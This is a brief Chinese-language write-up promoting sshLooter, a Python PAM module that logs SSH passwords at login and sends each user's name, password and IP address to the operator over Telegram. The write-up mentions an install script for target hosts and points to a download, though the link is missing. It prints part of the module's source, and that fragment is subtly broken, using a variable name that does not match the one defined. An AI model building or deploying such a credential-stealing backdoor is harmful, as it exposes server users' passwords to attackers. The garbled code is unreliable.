sshLooter是一个Python脚本,它使用PAM模块通过记录密码来窃取SSH密码,并在用户登录时通过Telegram通知脚本管理员,而不是通过不太可靠的strace。
def check_pw(user,password): """Check the password matches local unix password on file""" hashed_pw = spwd.getspnam(user)[1] return crypt.crypt(password,hash_pw) == hashed_pw def pam_sm_authenticate(pamh,flags,args): try: user = pamh.get_user() except pamh.exception as e: return e.pam_result
它还附带一个安装脚本,install.sh用于在目标主机上安装所有依赖项。
ssHLooter的灵感来自于使用Python通过另一个脚本窃取SSH密码来实现PAM模块以记录失败的尝试,作者只需要更改密码记录的位置。
连接人员的用户,密码和IP地址通过Telegram发送出去。
由于SSH在服务器管理中的使用非常多,因此它通常是恶意攻击者的目标,其中一个难忘的实例是Linux Backdoor Fokirtor注入流量进入SSH协议。
你可以在这里下载sshLooter:
或者在这里阅读更多。